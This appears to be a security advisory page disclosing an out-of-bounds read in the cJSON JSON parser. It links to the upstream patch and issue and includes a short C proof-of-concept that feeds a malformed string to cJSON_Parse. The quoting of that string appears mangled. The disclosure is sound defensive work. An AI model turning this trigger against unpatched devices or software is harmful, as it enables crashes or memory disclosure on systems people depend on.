cJSON buffer out of bound read

2016.10.02

Credit: Marco Grassi

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Hi,
I would like to report a buffer out of bound read problem in cJSON, which
is a embeddable JSON parser, used (I imagine) in embedded devices, or even
bigger stuff like the ps4 (
http://doc.dl.playstation.net/doc/ps4-oss/cjson.html).
patch:
https://github.com/DaveGamble/cJSON/commit/94df772485c92866ca417d92137747b2e3b0a917
issue:
https://github.com/DaveGamble/cJSON/issues/30
Poc with the malformed string
#include <stdio.h>
#include <stdint.h>
#include <fcntl.h>
#include "cJSON.h"
static const char *my_json = ""000000000000000000\";
int main(int argc, const char * argv[]) {
cJSON * root = cJSON_Parse(my_json);
char * rendered = cJSON_Print(root);
printf("%s\n", rendered);
return 0;
}
thanks
Marco

References:

https://github.com/DaveGamble/cJSON/commit/94df772485c92866ca417d92137747b2e3b0a917

https://github.com/DaveGamble/cJSON/issues/30

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

cJSON buffer out of bound read

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.